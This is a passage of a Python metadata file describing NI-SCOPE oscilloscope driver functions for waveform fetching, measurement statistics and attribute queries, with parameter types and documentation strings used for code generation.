'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': "\nThe channel to configure. For more information, refer to `Channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm','cvichannelstringsyntaxforc)>`__.\n"
},
'name': 'channelList',
'type': 'ViConstString'
},
{
'default_value': 'datetime.timedelta(seconds=5.0)',
'direction': 'in',
'documentation': {
'description': '\nThe time to wait in seconds for data to be acquired; using 0 for this\nparameter tells NI-SCOPE to fetch whatever is currently available. Using\n-1 for this parameter implies infinite timeout.\n'
},
'name': 'timeout',
'python_api_converter_name': 'convert_timedelta_to_seconds',
'type': 'ViReal64',
'type_in_documentation': 'float in seconds or datetime.timedelta'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe maximum number of samples to fetch for each waveform. If the\nacquisition finishes with fewer points than requested, some devices\nreturn partial data if the acquisition finished, was aborted, or a\ntimeout of 0 was used. If it fails to complete within the timeout\nperiod, the function returns an error.\n'
},
'name': 'numSamples',
'type': 'ViInt32'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns an array whose length is the **numSamples** times number of\nwaveforms. Call niScope_ActualNumwfms to determine the number of\nwaveforms.\n\nNI-SCOPE returns this data sequentially, so all record 0 waveforms are\nfirst. For example, with a channel list of 0,1, you would have the\nfollowing index values:\n\nindex 0 = record 0, channel 0\n\nindex *x* = record 0, channel 1\n\nindex 2\\ *x* = record 1, channel 0\n\nindex 3\\ *x* = record 1, channel 1\n\nWhere *x* = the record length\n'
},
'name': 'waveform',
'numpy': True,
'size': {
'mechanism': 'python-code',
'value': '(num_samples * self._actual_num_wfms())'
},
'type': 'ViInt16[]',
'use_array': True
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns an array of structures with the following timing and scaling\ninformation about each waveform:\n\n- **relativeInitialX**—the time (in seconds) from the trigger to the\n first sample in the fetched waveform\n- **absoluteInitialX**—timestamp (in seconds) of the first fetched\n sample. This timestamp is comparable between records and\n acquisitions; devices that do not support this parameter use 0 for\n this output.\n- **xIncrement**—the time between points in the acquired waveform in\n seconds\n- **actualSamples**—the actual number of samples fetched and placed in\n the waveform array\n- **gain**—the gain factor of the given channel; useful for scaling\n binary data with the following formula:\n\nvoltage = binary data × gain factor + offset\n\n- **offset**—the offset factor of the given channel; useful for scaling\n binary data with the following formula:\n\nvoltage = binary data × gain factor + offset\n\nCall niScope_ActualNumWfms to determine the size of this array.\n'
},
'name': 'wfmInfo',
'size': {
'mechanism': 'python-code',
'value': 'self._actual_num_wfms()'
},
'type': 'struct niScope_wfmInfo[]'
}
],
'returns': 'ViStatus'
},
'FetchBinary32': {
'codegen_method': 'private',
'documentation': {
'description': '\nRetrieves data from a previously initiated acquisition and returns\nbinary 32-bit waveforms. This function may return multiple waveforms\ndepending on the number of channels, the acquisition type, and the\nnumber of records you specify.\n\nRefer to `Using Fetch\nFunctions <REPLACE_DRIVER_SPECIFIC_URL_1(using_fetch_functions)>`__ for\nmore information on using this function.\n',
'note': '\nSome functionality, such as time stamping, is not supported in all\ndigitizers. Refer to `Features Supported by\nDevice <REPLACE_DRIVER_SPECIFIC_URL_1(features_supported_main)>`__ for\nmore information.\n'
},
'method_name_for_documentation': 'fetch_into',
'method_templates': [
{
'method_python_name_suffix': '_into_numpy',
'session_filename': 'numpy_read_method'
}
],
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': "\nThe channel to configure. For more information, refer to `Channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm','cvichannelstringsyntaxforc)>`__.\n"
},
'name': 'channelList',
'type': 'ViConstString'
},
{
'default_value': 'datetime.timedelta(seconds=5.0)',
'direction': 'in',
'documentation': {
'description': '\nThe time to wait in seconds for data to be acquired; using 0 for this\nparameter tells NI-SCOPE to fetch whatever is currently available. Using\n-1 for this parameter implies infinite timeout.\n'
},
'name': 'timeout',
'python_api_converter_name': 'convert_timedelta_to_seconds',
'type': 'ViReal64',
'type_in_documentation': 'float in seconds or datetime.timedelta'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe maximum number of samples to fetch for each waveform. If the\nacquisition finishes with fewer points than requested, some devices\nreturn partial data if the acquisition finished, was aborted, or a\ntimeout of 0 was used. If it fails to complete within the timeout\nperiod, the function returns an error.\n'
},
'name': 'numSamples',
'type': 'ViInt32'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns an array whose length is the **numSamples** times number of\nwaveforms. Call niScope_ActualNumwfms to determine the number of\nwaveforms.\n\nNI-SCOPE returns this data sequentially, so all record 0 waveforms are\nfirst. For example, with a channel list of 0,1, you would have the\nfollowing index values:\n\nindex 0 = record 0, channel 0\n\nindex *x* = record 0, channel 1\n\nindex 2\\ *x* = record 1, channel 0\n\nindex 3\\ *x* = record 1, channel 1\n\nWhere *x* = the record length\n'
},
'name': 'waveform',
'numpy': True,
'size': {
'mechanism': 'python-code',
'value': '(num_samples * self._actual_num_wfms())'
},
'type': 'ViInt32[]',
'use_array': True
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns an array of structures with the following timing and scaling\ninformation about each waveform:\n\n- **relativeInitialX**—the time (in seconds) from the trigger to the\n first sample in the fetched waveform\n- **absoluteInitialX**—timestamp (in seconds) of the first fetched\n sample. This timestamp is comparable between records and\n acquisitions; devices that do not support this parameter use 0 for\n this output.\n- **xIncrement**—the time between points in the acquired waveform in\n seconds\n- **actualSamples**—the actual number of samples fetched and placed in\n the waveform array\n- **gain**—the gain factor of the given channel; useful for scaling\n binary data with the following formula:\n\nvoltage = binary data × gain factor + offset\n\n- **offset**—the offset factor of the given channel; useful for scaling\n binary data with the following formula:\n\nvoltage = binary data × gain factor + offset\n\nCall niScope_ActualNumWfms to determine the size of this array.\n'
},
'name': 'wfmInfo',
'size': {
'mechanism': 'python-code',
'value': 'self._actual_num_wfms()'
},
'type': 'struct niScope_wfmInfo[]'
}
],
'returns': 'ViStatus'
},
'FetchBinary8': {
'codegen_method': 'private',
'documentation': {
'description': '\nRetrieves data from a previously initiated acquisition and returns\nbinary 8-bit waveforms. This function may return multiple waveforms\ndepending on the number of channels, the acquisition type, and the\nnumber of records you specify.\n\nRefer to `Using Fetch\nFunctions <REPLACE_DRIVER_SPECIFIC_URL_1(using_fetch_functions)>`__ for\nmore information on using this function.\n',
'note': '\nSome functionality, such as time stamping, is not supported in all\ndigitizers. Refer to `Features Supported by\nDevice <REPLACE_DRIVER_SPECIFIC_URL_1(features_supported_main)>`__ for\nmore information.\n'
},
'method_name_for_documentation': 'fetch_into',
'method_templates': [
{
'method_python_name_suffix': '_into_numpy',
'session_filename': 'numpy_read_method'
}
],
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': "\nThe channel to configure. For more information, refer to `Channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm','cvichannelstringsyntaxforc)>`__.\n"
},
'name': 'channelList',
'type': 'ViConstString'
},
{
'default_value': 'datetime.timedelta(seconds=5.0)',
'direction': 'in',
'documentation': {
'description': '\nThe time to wait in seconds for data to be acquired; using 0 for this\nparameter tells NI-SCOPE to fetch whatever is currently available. Using\n-1 for this parameter implies infinite timeout.\n'
},
'name': 'timeout',
'python_api_converter_name': 'convert_timedelta_to_seconds',
'type': 'ViReal64',
'type_in_documentation': 'float in seconds or datetime.timedelta'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe maximum number of samples to fetch for each waveform. If the\nacquisition finishes with fewer points than requested, some devices\nreturn partial data if the acquisition finished, was aborted, or a\ntimeout of 0 was used. If it fails to complete within the timeout\nperiod, the function returns an error.\n'
},
'name': 'numSamples',
'type': 'ViInt32'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns an array whose length is the **numSamples** times number of\nwaveforms. Call niScope_ActualNumwfms to determine the number of\nwaveforms.\n\nNI-SCOPE returns this data sequentially, so all record 0 waveforms are\nfirst. For example, with a channel list of 0,1, you would have the\nfollowing index values:\n\nindex 0 = record 0, channel 0\n\nindex *x* = record 0, channel 1\n\nindex 2\\ *x* = record 1, channel 0\n\nindex 3\\ *x* = record 1, channel 1\n\nWhere *x* = the record length\n'
},
'name': 'waveform',
'numpy': True,
'size': {
'mechanism': 'python-code',
'value': '(num_samples * self._actual_num_wfms())'
},
'type': 'ViInt8[]',
'use_array': True
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns an array of structures with the following timing and scaling\ninformation about each waveform:\n\n- **relativeInitialX**—the time (in seconds) from the trigger to the\n first sample in the fetched waveform\n- **absoluteInitialX**—timestamp (in seconds) of the first fetched\n sample. This timestamp is comparable between records and\n acquisitions; devices that do not support this parameter use 0 for\n this output.\n- **xIncrement**—the time between points in the acquired waveform in\n seconds\n- **actualSamples**—the actual number of samples fetched and placed in\n the waveform array\n- **gain**—the gain factor of the given channel; useful for scaling\n binary data with the following formula:\n\nvoltage = binary data × gain factor + offset\n\n- **offset**—the offset factor of the given channel; useful for scaling\n binary data with the following formula:\n\nvoltage = binary data × gain factor + offset\n\nCall niScope_ActualNumWfms to determine the size of this array.\n'
},
'name': 'wfmInfo',
'size': {
'mechanism': 'python-code',
'value': 'self._actual_num_wfms()'
},
'type': 'struct niScope_wfmInfo[]'
}
],
'returns': 'ViStatus'
},
'FetchComplex': {
'codegen_method': 'no',
'documentation': {
'description': '\nRetrieves data that the digitizer has acquired from a previously\ninitiated acquisition and returns a one-dimensional array of complex,\nscaled waveforms.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': "\nThe channel to configure. For more information, refer to `Channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm','cvichannelstringsyntaxforc)>`__.\n"
},
'name': 'channelList',
'type': 'ViConstString'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe time to wait in seconds for data to be acquired; using 0 for this\nparameter tells NI-SCOPE to fetch whatever is currently available. Using\n-1 for this parameter implies infinite timeout.\n'
},
'name': 'timeout',
'python_api_converter_name': 'convert_timedelta_to_seconds',
'type': 'ViReal64',
'type_in_documentation': 'float in seconds or datetime.timedelta'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe maximum number of samples to fetch for each waveform. If the\nacquisition finishes with fewer points than requested, some devices\nreturn partial data if the acquisition finished, was aborted, or a\ntimeout of 0 was used. If it fails to complete within the timeout\nperiod, the function returns an error.\n'
},
'name': 'numSamples',
'type': 'ViInt32'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns an array whose length is the **numSamples** times number of\nwaveforms. Call niScope_ActualNumwfms to determine the number of\nwaveforms.\n'
},
'name': 'wfm',
'size': {
'mechanism': 'python-code',
'value': None
},
'type': 'NIComplexNumber[]'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns an array of structures with the following timing and scaling\ninformation about each waveform:\n\n- **relativeInitialX**—the time (in seconds) from the trigger to the\n first sample in the fetched waveform\n- **absoluteInitialX**—timestamp (in seconds) of the first fetched\n sample. This timestamp is comparable between records and\n acquisitions; devices that do not support this parameter use 0 for\n this output.\n- **xIncrement**—the time between points in the acquired waveform in\n seconds\n- **actualSamples**—the actual number of samples fetched and placed in\n the waveform array\n- **gain**—the gain factor of the given channel; useful for scaling\n binary data with the following formula:\n\nvoltage = binary data × gain factor + offset\n\n- **offset**—the offset factor of the given channel; useful for scaling\n binary data with the following formula:\n\nvoltage = binary data × gain factor + offset\n\nCall niScope_ActualNumWfms to determine the size of this array.\n'
},
'name': 'wfmInfo',
'size': {
'mechanism': 'python-code',
'value': None
},
'type': 'struct niScope_wfmInfo[]'
}
],
'returns': 'ViStatus'
},
'FetchComplexBinary16': {
'codegen_method': 'no',
'documentation': {
'description': '\nRetrieves data from single channels and records. Returns a\none-dimensional array of complex binary 16-bit waveforms.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': "\nThe channel to configure. For more information, refer to `Channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm','cvichannelstringsyntaxforc)>`__.\n"
},
'name': 'channelList',
'type': 'ViConstString'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe time to wait in seconds for data to be acquired; using 0 for this\nparameter tells NI-SCOPE to fetch whatever is currently available. Using\n-1 for this parameter implies infinite timeout.\n'
},
'name': 'timeout',
'python_api_converter_name': 'convert_timedelta_to_seconds',
'type': 'ViReal64',
'type_in_documentation': 'float in seconds or datetime.timedelta'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe maximum number of samples to fetch for each waveform. If the\nacquisition finishes with fewer points than requested, some devices\nreturn partial data if the acquisition finished, was aborted, or a\ntimeout of 0 was used. If it fails to complete within the timeout\nperiod, the function returns an error.\n'
},
'name': 'numSamples',
'type': 'ViInt32'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns an array whose length is the **numSamples** times number of\nwaveforms. Call niScope_ActualNumwfms to determine the number of\nwaveforms.\n'
},
'name': 'wfm',
'size': {
'mechanism': 'python-code',
'value': None
},
'type': 'NIComplexI16[]'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns an array of structures with the following timing and scaling\ninformation about each waveform:\n\n- **relativeInitialX**—the time (in seconds) from the trigger to the\n first sample in the fetched waveform\n- **absoluteInitialX**—timestamp (in seconds) of the first fetched\n sample. This timestamp is comparable between records and\n acquisitions; devices that do not support this parameter use 0 for\n this output.\n- **xIncrement**—the time between points in the acquired waveform in\n seconds\n- **actualSamples**—the actual number of samples fetched and placed in\n the waveform array\n- **gain**—the gain factor of the given channel; useful for scaling\n binary data with the following formula:\n\nvoltage = binary data × gain factor + offset\n\n- **offset**—the offset factor of the given channel; useful for scaling\n binary data with the following formula:\n\nvoltage = binary data × gain factor + offset\n\nCall niScope_ActualNumWfms to determine the size of this array.\n'
},
'name': 'wfmInfo',
'size': {
'mechanism': 'python-code',
'value': None
},
'type': 'struct niScope_wfmInfo[]'
}
],
'returns': 'ViStatus'
},
'FetchDispatcher': {
'codegen_method': 'python-only',
'documentation': {
'description': '\nReturns the waveform from a previously initiated acquisition that the\ndigitizer acquires for the specified channel. This function returns\nscaled voltage waveforms.\n\nThis function may return multiple waveforms depending on the number of\nchannels, the acquisition type, and the number of records you specify.',
'note': 'Some functionality, such as time stamping, is not supported in all digitizers.'
},
'method_templates': [
{
'documentation_filename': 'default_method',
'method_python_name_suffix': '_into',
'session_filename': 'fetch_waveform'
}
],
'parameters': [
{
'direction': 'in',
'documentation': {
'description': 'The instrument handle you obtain from niScope_init that identifies a particular instrument session.'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': 'The channel(s) to fetch from.'
},
'name': 'channelList',
'type': 'ViString'
},
{
'direction': 'in',
'documentation': {
'description': "\nnumpy array of the appropriate type and size the should be acquired as a 1D array. Size should be **num_samples** times number of waveforms. Call niScope_ActualNumWfms to determine the number of waveforms.\n\nTypes supported are\n\n- `numpy.float64`\n- `numpy.int8`\n- `numpy.in16`\n- `numpy.int32`\n\nExample:\n\n.. code-block:: python\n\n waveform = numpy.ndarray(num_samples * session.actual_num_wfms(), dtype=numpy.float64)\n wfm_info = session['0,1'].fetch_into(num_samples, waveform, timeout=5.0)"
},
'name': 'waveform',
'numpy': True,
'type': 'ViReal64',
'use_array': True
},
{
'default_value': 'FetchRelativeTo.PRETRIGGER',
'direction': 'in',
'documentation': {
'description': 'Position to start fetching within one record.'
},
'enum': 'FetchRelativeTo',
'name': 'relativeTo',
'type': 'ViInt32'
},
{
'default_value': 0,
'direction': 'in',
'documentation': {
'description': 'Offset in samples to start fetching data within each record.The offset can be positive or negative.'
},
'name': 'offset',
'type': 'ViInt32'
},
{
'default_value': 0,
'direction': 'in',
'documentation': {
'description': 'Zero-based index of the first record to fetch.'
},
'name': 'recordNumber',
'type': 'ViInt32'
},
{
'default_value': None,
'direction': 'in',
'documentation': {
'description': 'Number of records to fetch. Use -1 to fetch all configured records.'
},
'name': 'numRecords',
'type': 'ViInt32'
},
{
'default_value': 'datetime.timedelta(seconds=5.0)',
'direction': 'in',
'documentation': {
'description': 'The time to wait in seconds for data to be acquired; using 0 for this parameter tells NI-SCOPE to fetch whatever is currently available. Using -1 for this parameter implies infinite timeout.'
},
'name': 'timeout',
'type': 'ViReal64',
'type_in_documentation': 'float in seconds or datetime.timedelta'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns an array of classed with the following timing and scaling information about each waveform:\n\n- **relative_initial_x** (float) the time (in seconds) from the trigger to the first sample in the fetched waveform\n- **absolute_initial_x** (float) timestamp (in seconds) of the first fetched sample. This timestamp is comparable between records and acquisitions; devices that do not support this parameter use 0 for this output.\n- **x_increment** (float) the time between points in the acquired waveform in seconds\n- **channel** (str) channel name this waveform was asquire from\n- **record** (int) record number of this waveform\n- **gain** (float) the gain factor of the given channel; useful for scaling binary data with the following formula:\n\n .. math::\n\n voltage = binary data * gain factor + offset\n\n- **offset** (float) the offset factor of the given channel; useful for scaling binary data with the following formula:\n\n .. math::\n\n voltage = binary data * gain factor + offset\n\n- **samples** (array of float) floating point array of samples. Length will be of the actual samples acquired\n'
},
'name': 'wfmInfo',
'type': 'struct niScope_wfmInfo'
}
],
'python_name': 'fetch',
'returns': 'ViStatus'
},
'FetchMeasurement': {
'codegen_method': 'private',
'documentation': {
'description': '\nFetches a waveform from the digitizer and performs the specified\nwaveform measurement. Refer to `Using Fetch\nFunctions <REPLACE_DRIVER_SPECIFIC_URL_1(using_fetch_functions)>`__ for\nmore information.\n\nMany of the measurements use the low, mid, and high reference levels.\nYou configure the low, mid, and high references by using\nNISCOPE_ATTR_MEAS_CHAN_LOW_REF_LEVEL,\nNISCOPE_ATTR_MEAS_CHAN_MID_REF_LEVEL, and\nNISCOPE_ATTR_MEAS_CHAN_HIGH_REF_LEVEL to set each channel\ndifferently.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': "\nThe channel to configure. For more information, refer to `Channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm','cvichannelstringsyntaxforc)>`__.\n"
},
'name': 'channelList',
'type': 'ViConstString'
},
{
'default_value': 'datetime.timedelta(seconds=5.0)',
'direction': 'in',
'documentation': {
'description': '\nThe time to wait in seconds for data to be acquired; using 0 for this\nparameter tells NI-SCOPE to fetch whatever is currently available. Using\n-1 for this parameter implies infinite timeout.\n'
},
'name': 'timeout',
'python_api_converter_name': 'convert_timedelta_to_seconds',
'type': 'ViReal64',
'type_in_documentation': 'float in seconds or datetime.timedelta'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe `scalar\nmeasurement <REPLACE_DRIVER_SPECIFIC_URL_2(scalar_measurements_refs)>`__\nto be performed.\n'
},
'enum': 'ScalarMeasurement',
'name': 'scalarMeasFunction',
'type': 'ViInt32'
},
{
'direction': 'out',
'documentation': {
'description': '\nContains an array of all measurements acquired; call\nniScope_ActualNumWfms to determine the array length.\n'
},
'name': 'result',
'size': {
'mechanism': 'python-code',
'value': 'self._actual_num_wfms()'
},
'type': 'ViReal64[]'
}
],
'returns': 'ViStatus'
},
'FetchMeasurementStats': {
'codegen_method': 'private',
'documentation': {
'description': '\nObtains a waveform measurement and returns the measurement value. This\nfunction may return multiple statistical results depending on the number\nof channels, the acquisition type, and the number of records you\nspecify.\n\nYou specify a particular measurement type, such as rise time, frequency,\nor voltage peak-to-peak. The waveform on which the digitizer calculates\nthe waveform measurement is from an acquisition that you previously\ninitiated. The statistics for the specified measurement function are\nreturned, where the statistics are updated once every acquisition when\nthe specified measurement is fetched by any of the Fetch Measurement\nfunctions. If a Fetch Measurement function has not been called, this\nfunction fetches the data on which to perform the measurement. The\nstatistics are cleared by calling\nniScope_ClearWaveformMeasurementStats. Refer to `Using Fetch\nFunctions <REPLACE_DRIVER_SPECIFIC_URL_1(using_fetch_functions)>`__ for\nmore information on incorporating fetch functions in your application.\n\nMany of the measurements use the low, mid, and high reference levels.\nYou configure the low, mid, and high references with\nNISCOPE_ATTR_MEAS_CHAN_LOW_REF_LEVEL,\nNISCOPE_ATTR_MEAS_CHAN_MID_REF_LEVEL, and\nNISCOPE_ATTR_MEAS_CHAN_HIGH_REF_LEVEL to set each channel\ndifferently.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': "\nThe channel to configure. For more information, refer to `Channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm','cvichannelstringsyntaxforc)>`__.\n"
},
'name': 'channelList',
'type': 'ViConstString'
},
{
'default_value': 'datetime.timedelta(seconds=5.0)',
'direction': 'in',
'documentation': {
'description': '\nThe time to wait in seconds for data to be acquired; using 0 for this\nparameter tells NI-SCOPE to fetch whatever is currently available. Using\n-1 for this parameter implies infinite timeout.\n'
},
'name': 'timeout',
'python_api_converter_name': 'convert_timedelta_to_seconds',
'type': 'ViReal64',
'type_in_documentation': 'float in seconds or datetime.timedelta'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe `scalar\nmeasurement <REPLACE_DRIVER_SPECIFIC_URL_2(scalar_measurements_refs)>`__\nto be performed on each fetched waveform.\n'
},
'enum': 'ScalarMeasurement',
'name': 'scalarMeasFunction',
'type': 'ViInt32'
},
{
'direction': 'out',
'documentation': {
'description': 'Returns the resulting measurement'
},
'name': 'result',
'size': {
'mechanism': 'python-code',
'value': 'self._actual_num_wfms()'
},
'type': 'ViReal64[]'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns the mean scalar value, which is obtained by averaging each\nniScope_FetchMeasurementStats call.\n'
},
'name': 'mean',
'size': {
'mechanism': 'python-code',
'value': 'self._actual_num_wfms()'
},
'type': 'ViReal64[]'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns the standard deviation of the most recent **numInStats**\nmeasurements.\n'
},
'name': 'stdev',
'size': {
'mechanism': 'python-code',
'value': 'self._actual_num_wfms()'
},
'type': 'ViReal64[]'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns the smallest scalar value acquired (the minimum of the\n**numInStats** measurements).\n'
},
'name': 'min',
'size': {
'mechanism': 'python-code',
'value': 'self._actual_num_wfms()'
},
'type': 'ViReal64[]'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns the largest scalar value acquired (the maximum of the\n**numInStats** measurements).\n'
},
'name': 'max',
'size': {
'mechanism': 'python-code',
'value': 'self._actual_num_wfms()'
},
'type': 'ViReal64[]'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns the number of times niScope_FetchMeasurementStats has been\ncalled.\n'
},
'name': 'numInStats',
'size': {
'mechanism': 'python-code',
'value': 'self._actual_num_wfms()'
},
'type': 'ViInt32[]'
}
],
'returns': 'ViStatus'
},
'FetchWaveform': {
'codegen_method': 'no',
'documentation': {
'description': '\nReturns the waveform from a previously initiated acquisition that the\ndigitizer acquires for the channel you specify.\n\nniScope_InitiateAcquisition starts an acquisition on the channels that\nyou enable with niScope_ConfigureVertical. The digitizer acquires\nwaveforms for the enabled channels concurrently. You use\nniScope_AcquisitionStatus to determine when the acquisition is\ncomplete. You must call this function separately for each enabled\nchannel to obtain the waveforms.\n\nYou can call niScope_ReadWaveform instead of\nniScope_InitiateAcquisition. niScope_ReadWaveform starts an\nacquisition on all enabled channels, waits for the acquisition to\ncomplete, and returns the waveform for the channel you specify. Call\nthis function to obtain the waveforms for each of the remaining\nchannels.\n',
'note': '\nThis function is included for compliance with the IviScope Class\nSpecification.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe channel to configure. For more information, refer to `channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm\',\'cvichannelstringsyntaxforc)>`__.\n\nDefault Value: "0"\n'
},
'name': 'channel',
'type': 'ViString'
},
{
'direction': 'in',
'documentation': {
'description': 'The number of elements to insert into the **waveform** array.'
},
'name': 'waveformSize',
'type': 'ViInt32'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns the waveform that the digitizer acquires.\n\nUnits: volts\n\n| Notes:\n| If the digitizer cannot sample a point in the waveform, this function\n returns an error.\n'
},
'name': 'waveform',
'size': {
'mechanism': 'python-code',
'value': None
},
'type': 'ViReal64[]'
},
{
'direction': 'out',
'documentation': {
'description': '\nIndicates the actual number of points the function placed in the\n**waveform** array.\n'
},
'name': 'actualPoints',
'type': 'ViInt32'
},
{
'direction': 'out',
'documentation': {
'description': '\nIndicates the time of the first point in the **waveform** array relative\nto the Reference Position.\n\nUnits: seconds\n\nFor example, if the digitizer acquires the first point in the\n**waveform** array 1 second before the trigger, this parameter returns\nthe value –1.0. If the acquisition of the first point occurs at the same\ntime as the trigger, this parameter returns the value 0.0.\n'
},
'name': 'initialX',
'type': 'ViReal64'
},
{
'direction': 'out',
'documentation': {
'description': '\nIndicates the length of time between points in the **waveform** array.\n\nUnits: seconds\n'
},
'name': 'xIncrement',
'type': 'ViReal64'
}
],
'returns': 'ViStatus'
},
'FetchWaveformMeasurement': {
'codegen_method': 'no',
'documentation': {
'description': '\nConfigure the appropriate reference levels before calling this function.\nYou can configure the low, mid, and high references by setting the\nfollowing attributes:\n\n| NISCOPE_ATTR_MEAS_HIGH_REF\n| NISCOPE_ATTR_MEAS_LOW_REF\n| NISCOPE_ATTR_MEAS_MID_REF\n',
'note': '\nThis function is included for compliance with the IviScope Class\nSpecification.\n\nYou can use niScope_ReadWaveformMeasurement instead of this function.\nniScope_ReadWaveformMeasurement starts an acquisition on all enabled\nchannels, waits for the acquisition to complete, obtains a waveform\nmeasurement on the specified channel, and returns the waveform for the\nspecified channel. Call this function separately to obtain any other\nwaveform measurements on a specific channel.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe channel to configure. For more information, refer to `channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm\',\'cvichannelstringsyntaxforc)>`__.\n\nDefault Value: "0"\n'
},
'name': 'channel',
'type': 'ViString'
},
{
'direction': 'in',
'documentation': {
'description': 'Characteristic of the acquired waveform to be measured.'
},
'name': 'measFunction',
'type': 'ViInt32'
},
{
'direction': 'out',
'documentation': {
'description': 'The measured value.'
},
'name': 'measurement',
'type': 'ViReal64'
}
],
'returns': 'ViStatus'
},
'GetAttributeViBoolean': {
'codegen_method': 'private',
'documentation': {
'description': '\nQueries the value of a ViBoolean attribute. You can use this function to\nget the values of instrument-specific attributes and inherent IVI\nattributes. If the attribute represents an instrument state, this\nfunction performs instrument I/O in the following cases:\n\n- State caching is disabled for the entire session or for the\n particular attribute.\n- State caching is enabled and the currently cached value is invalid.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': "\nThe channel to configure. For more information, refer to `Channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm','cvichannelstringsyntaxforc)>`__.\n"
},
'name': 'channelList',
'type': 'ViConstString'
},
{
'direction': 'in',
'documentation': {
'description': 'The ID of an attribute.'
},
'name': 'attributeId',
'type': 'ViAttr'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns the current value of the attribute; pass the address of a\nViBoolean variable.\n'
},
'name': 'value',
'type': 'ViBoolean'
}
],
'returns': 'ViStatus'
},
'GetAttributeViInt32': {
'codegen_method': 'private',
'documentation': {
'description': '\nQueries the value of a ViInt32 attribute. You can use this function to\nget the values of instrument-specific attributes and inherent IVI\nattributes. If the attribute represents an instrument state, this\nfunction performs instrument I/O in the following cases:\n\n- State caching is disabled for the entire session or for the\n particular attribute.\n- State caching is enabled and the currently cached value is invalid.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': "\nThe channel to configure. For more information, refer to `Channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm','cvichannelstringsyntaxforc)>`__.\n"
},
'name': 'channelList',
'type': 'ViConstString'
},
{
'direction': 'in',
'documentation': {
'description': 'The ID of an attribute.'
},
'name': 'attributeId',
'type': 'ViAttr'
},
{
'direction': 'out',
'documentation': {
'description': 'Returns the current value of the attribute.'
},
'name': 'value',
'type': 'ViInt32'
}
],
'returns': 'ViStatus'
},
'GetAttributeViInt64': {
'codegen_method': 'private',
'documentation': {
